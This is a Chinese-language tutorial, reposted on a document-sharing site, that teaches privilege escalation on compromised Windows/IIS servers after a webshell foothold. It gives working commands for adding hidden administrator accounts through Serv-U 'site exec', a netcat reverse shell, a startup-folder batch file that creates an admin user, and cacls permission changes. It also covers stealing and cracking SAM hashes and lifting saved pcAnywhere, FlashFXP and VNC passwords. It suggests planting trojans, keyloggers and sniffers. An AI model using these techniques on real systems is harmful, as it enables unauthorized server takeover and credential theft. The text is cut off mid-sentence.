




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)
文檔簡介
1、提權(quán)十五課 轉(zhuǎn)載提權(quán)十五課(轉(zhuǎn)載)2010-04-16 15:46第一課提權(quán)概述測試環(huán)境:Windows xp系統(tǒng)1了解什么是提權(quán)?通常是匿名權(quán)限(ASP)ASP.NET USER權(quán)限入侵獲得webshell并不完美,完美的是獲得服務(wù)器的權(quán)限。第一如果服務(wù)器上有裝了pcanywhere服務(wù)端,管理員為了管理方便123 123 IP也給了我們方便,到系統(tǒng)盤的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下載*.cif本地破解就使用pcanywhere連接就ok了第二有很多小黑問我這么把webshel
2、l的iis user權(quán)限提升一般服務(wù)器的管理都是本機設(shè)計完畢然后上傳到空間里,那么就會用到ftp,服務(wù)器使用最多的就是servu IIS那么我們就利用servu來提升權(quán)限通過servu提升權(quán)限需要servu安裝目錄可寫好開始把,首先通過webshell訪問servu安裝文件夾下的ServUDaemon.ini把他下載下來,然后在本機上安裝一個servu把ServUDaemon.ini放到本地安裝文件夾下覆蓋,啟動servu添加了一個用戶,設(shè)置為系統(tǒng)管理員,目錄C:,具有可執(zhí)行權(quán)限然后去servu安裝目錄里把ServUDaemon.ini更換服務(wù)器上的。用我新建的用戶和密碼連接好的,還是連上了
3、open ip Connected to ip.220 Serv-U v for WinSock ready.User(ip:(none):id/剛才添加的用戶331 User name okay,please send complete E-mail address as password.Password:password/密碼230 User logged in,proceed. winnt/進入win2k的winnt目錄250 Directory changed to/WINNT system32/進入system32目錄250 Directory changed to/
4、WINNT/system32 site exec net.exe user rover rover1234/add/利用系統(tǒng)的net.exe文件加用戶。第三就是先檢查有什么系統(tǒng)服務(wù),或者隨系統(tǒng)啟動自動啟動的程序和管理員經(jīng)常使用的軟件,比如諾頓,VAdministrator,金山,瑞星,WinRAR甚至QQ之類的,是否可以寫,如果可以就修改其程序,綁定一個批處理或者VBS,然后還是等待服務(wù)器重啟。第四查找conn和config,pass這類型的文件看能否得到sa或者mysql的相關(guān)密碼,可能會有所收獲等等。第五使用Flashfxp也能提升權(quán)限,但是成功率就看你自己的運氣了首先找到FlashFXP
5、文件夾,打開(編輯)Sites.dat,這個文件這是什么東西密碼和用戶名,而且密碼是加了密的。如果我把這些文件copy回本地也就是我的計算機中,替換我本地的相應(yīng)文件。然后會發(fā)現(xiàn)打開flashfxp在站點中打開站點管理器一樣。又可以添加N多肉雞啦嘻嘻唔?不對啊,是來提升權(quán)限的啊,暈,接著來別半途而廢。大家看看對方管理員的這站點管理器,有用戶名和密碼,密碼是星號的。經(jīng)過用xp星號密碼查看器查看,然后和Sites.dat中加密了密碼做比較發(fā)現(xiàn)并未加密而是查到的密碼是明文顯示,然后最終把這個網(wǎng)站管理員的密碼從這堆東西中找出來。那么下一步就可以鏈接這些新的服務(wù)器啦經(jīng)過測試只要把含有密碼和用戶名的Site
6、s.dat文件替換到本地相應(yīng)的文件就可以在本地還原對方管理員的各個站點的密碼。*第六WIN2K+IIS5.0默認情況下應(yīng)用程序保護選項是中(共用的),這時IIS加載isapi是用的iwam_computername用戶身份執(zhí)行。但默認情況下WIN2K+IIS5對于一些特殊isapi又要以system身份加載。win2k+iis5、win2k+iis5+sp1、win2k+iis5+sp2都是簡單的判斷isapi的文件名,并且沒有做目錄限制,以SYSTEM權(quán)限加載的isapi有:1、idq.dll 2、httpext.dll 3、httpodbc.dll 4、ssinc.dll 5、msw3pr
7、t.dll 6、author.dll 7、admin.dll 8、shtml.dll 9、sspifilt.dll 10、compfilt.dll 11、pwsdata.dll 12、md5filt.dll 13、fpexedll.dll所以利用這很容易得到SYSTEM權(quán)限。并且判斷文件名的時候有個bug,比如請求/scripts/test%81%5cssinc.dll也將會認為是請求的ssinc.dll,就是分離文件路徑的時候沒有考慮到雙字節(jié)的遠東版問題。ssinc.dll在處理包含文件路徑的時候也有一個問題,就是/、只識別了一個/,所以如果請求里面使用,就會錯誤的處理包含文件路徑,有可能泄
8、露東西或者出現(xiàn)權(quán)限漏洞,這種漏洞很多別的地方(php、asp等)也還存在。加載這些isapi不是單以文件名做依據(jù)了,而是加了路徑,應(yīng)該是修正了此問題。一般默認情況下是:1、idq.dll d:winntsystem32idq.dll 2、httpext.dll d:winntsystem32inetsrvhttpext.dll 3、httpodbc.dll d:winntsystem32inetsrvhttpodbc.dll 4、ssinc.dll d:winntsystem32inrtsrvssinc.dll 5、msw3prt.dll d:winntsystem32msw3prt.dll
9、6、author.dll D:Program FilesCommon FilesMicrosoft Sharedweb server extensionsisapi_vti_autauthor.dll 7、admin.dll D:Program FilesCommon FilesMicrosoft Sharedweb server extensionsisapi_vti_admadmin.dll 8、shtml.dll D:Program FilesCommon FilesMicrosoft Sharedweb server extensionsisapishtml.dll 9、sspifil
10、t.dll d:winntsystem32inetsrvsspifilt.dll 10、compfilt.dll d:winntsystem32inetsrvcompfilt.dll 11、pwsdata.dll d:winntsystem32inetsrvpwsdata.dll 12、md5filt.dll d:winntsystem32inetsrvmd5filt.dll 13、fpexedll.dll D:Program FilesCommon FilesMicrosoft Sharedweb server extensionsbinfpexedll.dll正常情況下這些路徑都guest
11、不能寫,但如果配置不好,這些路徑iis user能夠?qū)懥司鸵粯涌梢蕴嵘龣?quán)限了可以把ISAPIHack.dll上傳到IIS的可執(zhí)行目錄,文件名可叫ssinc.dll或者admin.dll等(上面列的13個文件名之一)。然后等待IIS重啟加載此dll,就可以獲得權(quán)限了*第七下載系統(tǒng)的%windir%repairsam.*(WinNT 4下是sam._而Windows 2000下是sam)文件,然后用L0pht等軟件進行破解,只要能拿到,肯花時間,就一定可以破解。*第八PipeUpAdmin(Windows 2000下),在本機運行可以把當前用戶帳號加入管理員組。普通用戶和Guests組用戶都可以成
12、功運行。*第九Serv-u 本地權(quán)限提升漏洞:很多主機的C:Documents and SettingsAll UsersDocuments目錄以及下邊幾個子目錄Documents沒有設(shè)置權(quán)限,導(dǎo)致可以在這個目錄上傳并運行Exp.直接上傳了serv-u local exploit和nc,并且把serv-u的本地提升權(quán)限的名字命名為su.exe文件就放在C:Documents and SettingsAll UsersDocuments,然后我們用su.exe直接建立用戶,也可以反彈一個shell過來的。具體命令:建立用戶:serv-u.execmdUSER xl PASS 111111反彈sh
13、ell:serv-u.exenc.exe-l-p 99-e cmd.exe很不錯的提權(quán)新方法第二課serv-u服務(wù)器提權(quán)(目錄無修改權(quán)限)serv-u是一款常見用于搭建網(wǎng)站的軟件,但也存在不少漏洞。這點讓入侵者有機會入侵。1首先服務(wù)器必須要有安裝serv-u安裝2滿足條件才能成功提權(quán)獲服務(wù)器權(quán)限3使用webshell自帶提權(quán)功能,提權(quán)cmd/c net user hxhack$dandan123/add&net localgroup administrators hxhack$/add然后用建立的用戶進行3389遠程桌面連接。第三課serv-u服務(wù)器提權(quán)(目錄有修改權(quán)限)1理解ServUDae
14、mon.ini文件的字段意思2修改ServUDaemon.ini文件3執(zhí)行程序,獲得權(quán)限=ServUDaemon.ini配置文件詳解=USER=honker|1/用戶名Password=gn3436a2a7150feb9edf0151aec2bcbde2/用戶密碼加密后的密文HomeDir=c:/默認根目錄TimeOut=600/超時時間設(shè)置Maintenance=System/權(quán)限Access1=C:|RWAMELCDP/可訪問的目錄及權(quán)限Access2=d:|RWAMELCDP/可訪問的目錄及權(quán)限Access3=e:|RWAMELCDP/可訪問的目錄及權(quán)限Quote site exec n
15、et user 4567 4567/add quote site exec net localgroup administrators 4567/add提示:200 EXEC command successful(TID=33).mstscC:Program FilesRhinoSServ-UServUAdmin.exe-USER=hx95|1Password=gn3436a2a7150feb9edf0151aec2bcbde2 HomeDir=c:TimeOut=600 Maintenance=System Access1=C:|RWAMELCDP Access2=d:|RWA
16、MELCDP Access3=e:|RWAMELCDP第四課pcanywhere提權(quán)方法測試環(huán)境:Windows xp系統(tǒng)=Pcanywhere軟件介紹:=這是一款老牌的計算機遠程控制軟件,功能強大。通過pcAnywhere,管理員可以用自己的計算機登錄其他計算機的游戲賬號,大大降低丟號的風險。強烈推薦游戲工作室使用!pcAnywhere的使用方法并不復(fù)雜,下面將為您詳細介紹,稍有計算機操作經(jīng)驗的人都可以輕松掌握。我們把管理員的計算機稱為主控端,員工的計算機稱為被控端。主控端和被控端需要分別安裝pcAnywhere軟件,然后通過pcAnywhere界面,管理員可以在自己的計算機上操作員工的計算
17、機,這就是pcAnywhere的基本原理。=獲得管理密碼的方法:=利用工具破解*.cif文件1個人電腦和服務(wù)器需要安裝2服務(wù)器啟動第五課FlashFXP替換文件提權(quán)測試環(huán)境:Windows xp系統(tǒng)提權(quán)思路:利用FlashFXP替換文件漏洞,可以讀取管理員連接過的站點帳戶密碼信息思路擴展:通過社會工程學(xué)猜測其他的密碼同樣如此,借此機會擴大權(quán)限收集密碼,利用社會工程學(xué),進一步利用,猜測。-FlashFXP是功能強大的FXP/FTP軟件,融合了一些其他優(yōu)秀FTP軟件的優(yōu)點,如像CuteFTP一樣可以比較文件夾,支持彩色文字顯示;像BpFTP支持多文件夾選擇文件,能夠緩存文件夾;像LeapFTP一樣
18、的外觀界面,甚至設(shè)計思路也差相仿佛。支持文件夾(帶子文件夾)的文件傳送、刪除;支持上傳、下載及第三方文件續(xù)傳;可以跳過指定的文件類型,只傳送需要的文件;可以自定義不同文件類型的顯示顏色;可以緩存遠端文件夾列表,支持FTP代理及Socks 4&5;具有避免空閑功能,防止被站點踢出;可以顯示或隱藏隱藏屬性的文件、文件夾;支持每個站點使用被動模式等。-問:FlashFXP中的FXP是什么意思?答:FXP是指在兩臺服務(wù)之間的直線傳輸。也可以稱為站到站傳輸(Site to Site Transfers)。FXP過程需要服務(wù)兩臺服務(wù)器均支持方可進行。它利用服務(wù)器之間的高速連接,實現(xiàn)文件的高效傳輸,幾乎不會
19、占用本機的帶寬資源。問:FlashFXP的不足。答:FlashFXP無法像CuteFTP那樣實現(xiàn)的多窗功能,CuteFTP可在一個窗口中打開多個站點。此外,F(xiàn)lashFXP尚不支持多進程傳輸,所有的下載和上傳任務(wù)均是以單線程進行。需要下載的文件:quick.dat sites.dat stats.dat將以上文件替換本地ftp發(fā)現(xiàn)連接時出現(xiàn)密碼。這是用密碼查看器查看可以破解密碼。第六課VNC密碼破解提權(quán)測試環(huán)境:Windows xp系統(tǒng)=VNC介紹=VNC(Virtual Network Computing,虛擬網(wǎng)絡(luò)計算)最早是一套由英國劍橋大學(xué)ATT實驗室在2002年開發(fā)的輕量型的遠程控制計
20、算機軟件,其采用了GPL授權(quán)條款,任何人都可免費取得該軟件。VNC軟件主要由兩個部分組成:VNC server及VNC viewer。用戶需先將VNC server安裝在被控端的計算機上后,才能在主控端執(zhí)行VNC viewer控制被控端。VNC server與VNC viewer支持多種操作系統(tǒng),如windows,Linux,MacOS及Unix系列(Unix,Solaris等),因此可將VNC server及VNC viewer分別安裝在不同的操作系統(tǒng)中進行控制。RealVNC的優(yōu)越性還在于如果操作系統(tǒng)的主控端計算機沒有安裝VNC viewer,也可以通過一般的網(wǎng)絡(luò)瀏覽器(如IE等)來控制被
21、控端(需要Java虛擬機的支持)。=VNC的運行過程=整個VNC一般運行的工作流程如下:(1)VNC客戶端通過瀏覽器或VNC Viewer連接至VNC Server。(2)VNC Server傳送一對話窗口至客戶端,要求輸入連接密碼(可能為空),以及存取的VNC Server顯示裝置。(3)在客戶端輸入連接密碼后,VNC Server驗證客戶端是否具有存取權(quán)限。(4)若是客戶端通過VNC Server的驗證,客戶端即要求VNC Server顯示桌面環(huán)境。(5)被控端將畫面顯示控制權(quán)交由VNC Server負責。(6)VNC Server將把被控端的桌面環(huán)境利用VNC通信協(xié)議送至客戶端,并且允許
22、客戶端控制VNC Server的桌面環(huán)境及輸入裝置。=VNC提權(quán)方法=利用shell讀取vnc保存在注冊表中的密文,使用工具VNC4X破解注冊表位置:HKEY_LOCAL_MACHINESOFTWARERealVNCWinVNC4password 69 45 150 96 177 b1 243 f3 153 99 89 59 148 94 22 16十六進制轉(zhuǎn)換成十進制。在用工具破解。第八課替換服務(wù)提權(quán)測試環(huán)境:Windows xp系統(tǒng)權(quán)限情況:通常我們?nèi)肭忠粋€服務(wù)器都是獲得了一個webshell,但是只要稍微有一點經(jīng)驗的管理員都知道,ASP運行的權(quán)限是非常底的(在這個地方是指我們的服務(wù)器的每
23、個磁盤的分區(qū)格式必須是NTFS分區(qū))因為只有NTFS分區(qū)才可能具有權(quán)限管理的功能。但是在很多情況下,我們?nèi)匀豢梢杂龅竭@樣的情況:服務(wù)器管理員由于各種原因,并沒有把服務(wù)器的各個磁盤的格式設(shè)置為NTFS,而且是FAT32格式,也就是說服務(wù)器沒有權(quán)限的限制,那么再近一步就是說我們可以任意的控制任何一個磁盤(包括可以上傳文件、刪除文件、替換文件)那么大家一定馬上可以想到,在服務(wù)器的啟動項里面是不是都是以SYSTEM權(quán)限啟動的?OK,對了,那么我們就可以-替換服務(wù)使用工具:自己的木馬,或者后門等(只要可以達到控制服務(wù)器的目的就可以)提權(quán)思路:既然服務(wù)器的各個磁盤沒有任何的權(quán)限限制,那么我們就可以替換任意
24、文件,既然這樣,我們幾乎一定等于控制了整個服務(wù)器思路擴展:其實如果對方的服務(wù)器沒有采用NFTS+磁盤權(quán)限管理,我們就可以對任何文件都具有運行的權(quán)利,那么我們上傳一個sniffer上去,或者上傳一個鍵盤記錄上去,也不是不可以,更多的思路期待大家去大膽的想象第九課利用HASH破解提權(quán)測試環(huán)境:Windows xp系統(tǒng)使用工具:SAMinside、LC5、提權(quán)思路:利用SAMinside軟件的抓取系統(tǒng)用戶HASH值,然后使用LC5進行破解思路擴展:本次提權(quán)主要是運用在針對大型服務(wù)器集群或者是同一個管理員管理的機房,利用了社會工程學(xué)的原理在里面,因為一般同一個管理員管理的服務(wù)器都是同一個密碼。其實還可
25、以想象到其他很多方法,比如:在管理員的登陸入口寫入代碼,抓取管理員的各種敏感信息。2、在服務(wù)器上掛馬,讓管理員使用的PC機中馬,然后就可以獲得非常多的管理員常用密碼信息,其實還有很多,大家可以充分發(fā)揮想象能力提權(quán)步驟:1、使用SAMinside抓取服務(wù)器HASH 2、導(dǎo)出為txt文件3、使用LC5進行HASH破解第十課啟動項提權(quán)測試環(huán)境:Windows xp系統(tǒng)1建立一個文本,文本內(nèi)容輸入echo off net user xixi 123456/add net localgroup administrators xixi/add然后改名字為add.bat 2利用webshell把建立好的ad
26、d.bat放到啟動項里。只要管理員重新啟動計算機后,就會執(zhí)行我們的add.bat文件。這樣一來,就建立了一個用戶第十一課CAcls命令在提權(quán)中的使用課程主要內(nèi)容:利用webshell的cmd命令執(zhí)行功能,使用cacls命令,修改服務(wù)器磁盤、文件夾或NET.EXE為最低權(quán)限,提升權(quán)限。關(guān)鍵技術(shù)要點:cacls命令詳細使用方法。隨著管理員的對服務(wù)器的熟悉和黑客入侵的過程越來越了解,相應(yīng)的就在入侵的關(guān)鍵點上設(shè)置了障礙,這些障礙的投置有些比較簡單,是可以被繞過的,比如管理員很喜歡作的一件事是把首頁文件設(shè)置沒對IUSER_用戶沒有寫權(quán)限,用來防止被掛木馬或者將NET.EXE,等工具設(shè)置不給于IUSER用
27、戶使用權(quán)限,讓我們無法用NET USER建帳號或FTP進行下載,我們可以利用Cacls修改權(quán)限后再正常使用,cacls是windows自帶的一個權(quán)限修改工具,它是在命令行下運行的,能很方便的修改文件或目錄的權(quán)限,cacls成功的條件是要修改的文件允他的主要運行參數(shù)如下Cacls /T/E/C/G usererm/R user./P usererm./D user.:顯示訪問控制列表(以下簡稱ACL)/T:更改當前目錄及其所有子目錄中指定文件的ACL/E:編輯ACL而不替換/C:在出現(xiàn)拒絕訪問錯誤時繼續(xù)/G Userer:perm:賦予指定用戶訪問權(quán)限,Perm代表不同級別的訪問權(quán)限,其值可以是
28、R(讀取)、W(寫入)、C(更改,寫入)、F(完全控制)等。/R user:撤銷指定用戶的訪問權(quán)限,注意該參數(shù)僅在與/E一起使用時有效。/P user:perm:替換指定用戶的訪問權(quán)限,perm的含義同前,但增加了N(無)的選項。/D user:拒絕指定用戶的訪問假設(shè)欲修改CMD.EXE的權(quán)限執(zhí)行cacls E:index.asp/t/e/c/g interactive:f給把CMD的完全控制權(quán)限給予了interactive組成員(IIS訪問用戶IUSER_機器名就在這一組中).這時通過CMD可以正常使用了要修改一個文件的權(quán)限的必要條件:要有USERS組的完全控制權(quán)限CMD權(quán)限第十二課Wind
29、ows-2003-webshell默認權(quán)限課程主要內(nèi)容:詳細講解在iis默認配置和典型配置下的webshell權(quán)限,包括讀、寫、執(zhí)行權(quán)限,已經(jīng)擴展權(quán)限:fso、運行cmd、rwirte權(quán)限等。講解權(quán)限提升概念。關(guān)鍵技術(shù)要點:典型配置下的webshell可使用權(quán)限;提權(quán)概念。默認設(shè)置首要區(qū)別!默認在WINDOWS2003下是沒有安裝IIS的?默認只安裝靜態(tài)HTTP服務(wù)器IIS 6.0的默認安裝被設(shè)置為僅安裝靜態(tài)HTML頁面顯示所需的組件,而不允許動態(tài)內(nèi)容。?增強的文件訪問控制匿名帳號不再具有web服務(wù)器根目錄的寫權(quán)限。另外,F(xiàn)TP用戶也被相互隔離在他們自己的根目錄中。這些限制有效的避免了用戶向服
30、務(wù)器文件系統(tǒng)的其他部分上傳一些有害程序。例如攻擊者可以向scripts目錄上傳一些有害的可執(zhí)行代碼,并遠程執(zhí)行這些代碼,從而攻擊web站點父目錄被禁用IIS 6.0中默認禁用了對父目錄的訪問。這樣可以避免攻擊者跨越web站點的目錄結(jié)構(gòu),訪問服務(wù)器上的其他敏感文件,如SAM文件等。當然也請注意,由于父目錄默認被禁用,這可能導(dǎo)致一些從早期版本IIS上遷移過來的應(yīng)用由于無法使用父目錄而出錯。堅持最小特權(quán)原則IIS 6.0堅持一個基本安全原則-最小特權(quán)原則。也就是說,HTTP.sys中所有代碼都是以Local System權(quán)限執(zhí)行的,而所有的工作進程,都是以Network Service的權(quán)限執(zhí)行的。
31、Network Service是Windows 2003中新內(nèi)置的一個被嚴格限制的賬號。另外,IIS 6.0只允許管理員執(zhí)行命令行工具,從而避免命令行工具的惡意使用。這些設(shè)計上的改變,都降低了通過潛在的漏洞攻擊服務(wù)器的可能性。部分基礎(chǔ)設(shè)計上的改變、一些簡單配置的更改(包括取消匿名用戶向web服務(wù)器的根目錄寫入權(quán)限,和將FTP用戶的訪問隔離在他們各自的主目錄中)都極大地提高了IIS 6.0的安全性。典型配置的權(quán)限1、磁盤權(quán)限系統(tǒng)盤及所有磁盤只給Administrators組和SYSTEM的完全控制權(quán)限系統(tǒng)盤Documents and Settings目錄只給Administrators組和SYS
32、TEM的完全控制權(quán)限系統(tǒng)盤Documents and SettingsAll Users目錄只給Administrators組和SYSTEM的完全控制權(quán)限系統(tǒng)盤Inetpub目錄及下面所有目錄、文件只給Administrators組和SYSTEM的完全控制權(quán)限系統(tǒng)盤WindowsSystem32cacls.exe、cmd.exe、net.exe、net1.exe文件只給Administrators組和SYSTEM的完全控制權(quán)限2.不使用默認的Web站點,如果使用也要將IIS目錄與系統(tǒng)磁盤分開IIS默認創(chuàng)建的Inetpub目錄被刪除(在安裝系統(tǒng)的盤上)3.每個獨立的要保護的個體(比如一個網(wǎng)站或者
33、一個虛擬目錄)創(chuàng)建一個系統(tǒng)用戶,讓這個站點在系統(tǒng)中具有惟一的可以設(shè)置權(quán)限的身份在典型的WEBSEHLL下,對于本站具有,讀,寫,修改,權(quán)限,目錄下?lián)碛邢鄬Φ膱?zhí)行權(quán)限.第十三課Windows 2003服務(wù)器默認文件夾權(quán)限課程主要內(nèi)容:詳細講解Windows 2003服務(wù)器默認文件夾權(quán)限,重點講解系統(tǒng)盤所在文件夾默認權(quán)限和iis所在文件夾權(quán)限設(shè)置。詳細講解文件夾屬性中的只讀、系統(tǒng)、隱藏屬性,詳細講解文件夾的權(quán)限繼承、非繼承、擴展權(quán)限。關(guān)鍵技術(shù)要點:windows 2003所有系統(tǒng)文件夾默認權(quán)限。Windows目錄的權(quán)限:(1)完全控制完全控制就是對目錄擁有不受限制的完全訪問。地位就像Adminis
34、trators在所有組中的地位一樣。選中了完全控制,下面的五項屬性將被自動被選中。(2)修改修改則像Power users,選中了修改,下面的四項屬性將被自動被選中。下面的任何一項沒有被選中時,修改條件將不再成立。(3)讀取和運行讀取和運行就是允許讀取和運行在目錄下的任何文件,列出文件夾目錄和讀取是讀取和運行的必要條件。(4)列出文件夾目錄列出文件夾目錄是指只能瀏覽該卷或目錄下的子目錄,不能讀取,也不能運行。(5)讀取讀取是能夠讀取該卷或目錄下的數(shù)據(jù)。(6)寫入寫入就是能往該卷或目錄下寫入數(shù)據(jù)。(7)特別的權(quán)限。而特別則是對以上的六種權(quán)限進行了細分。3.權(quán)限的四個特性-繼承性、累加性、優(yōu)先性、
35、交叉性三種文件和文件夾屬性只讀:顧名思義,只能讀,不能修改系統(tǒng):被隱藏保護通常不會顯示隱藏:隱藏不顯示.系統(tǒng)盤權(quán)限設(shè)置c:administrators全部(該文件夾,子文件夾及文件)CREATOR OWNER全部(只有子文件來及文件)system全部(該文件夾,子文件夾及文件)IIS_WPG創(chuàng)建文件/寫入數(shù)據(jù)(只有該文件夾)IIS_WPG(該文件夾,子文件夾及文件)遍歷文件夾/運行文件列出文件夾/讀取數(shù)據(jù)讀取屬性創(chuàng)建文件夾/附加數(shù)據(jù)讀取權(quán)限c:Documents and Settings administrators全部(該文件夾,子文件夾及文件)Power Users(該文件夾,子文件夾及文
36、件)讀取和運行列出文件夾目錄讀取SYSTEM全部(該文件夾,子文件夾及文件)C:Program Files administrators全部(該文件夾,子文件夾及文件)CREATOR OWNER全部(只有子文件來及文件)IIS_WPG(該文件夾,子文件夾及文件)讀取和運行列出文件夾目錄讀取Power Users(該文件夾,子文件夾及文件)修改權(quán)限SYSTEM全部(該文件夾,子文件夾及文件)TERMINAL SERVER USER(該文件夾,子文件夾及文件)修改權(quán)限最后,文件夾的權(quán)限繼承、非繼承、擴展權(quán)限第十四課利用perl提升權(quán)限課程主要內(nèi)容:通過webshell,詢找PERL默認目錄,利用目錄權(quán)限漏洞實現(xiàn)權(quán)限提升。關(guān)鍵技術(shù)要點:學(xué)會使用PERL的SHELL。什么是Perl?Perl就是Practical Extractio
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 電焊工施工合同協(xié)議書
- 湖北省隨州市部分高中2024-2025學(xué)年高一下學(xué)期2月聯(lián)考地理試卷(含答案)
- 洗衣設(shè)備購銷合同共
- 健身房運營管理作業(yè)指導(dǎo)書
- 會議策劃與活動執(zhí)行服務(wù)協(xié)議
- 健康科技在老年健康管理中的應(yīng)用解決方案
- 水利建設(shè)工程施工合同協(xié)議書
- 大學(xué)生科普小說讀后感
- 觀看紀錄片長江觀后感
- 車隊土石方運輸合同
- 低空經(jīng)濟產(chǎn)業(yè)示范區(qū)建設(shè)實施路徑
- 常見隔離手術(shù)
- 第47屆世界技能大賽江蘇省選拔賽網(wǎng)絡(luò)安全項目技術(shù)工作文件
- 2024中華人民共和國文物保護法詳細解讀課件
- B細胞靶向藥物治療風濕免疫病中國專家共識(2024版)
- 職業(yè)教育培訓(xùn)項目建設(shè)內(nèi)容
- 手機租賃合同模板
- 成人禮快閃開場相冊演示模板
- 國家職業(yè)技術(shù)技能標準 5-04-01-01 淡水水生動物苗種繁育工 人社廳發(fā)20155號
- 現(xiàn)代家政導(dǎo)論-課件 4.1.2認識國外家政教育發(fā)展
- 項目式教學(xué)在小學(xué)數(shù)學(xué)教學(xué)中的應(yīng)用
評論
0/150
提交評論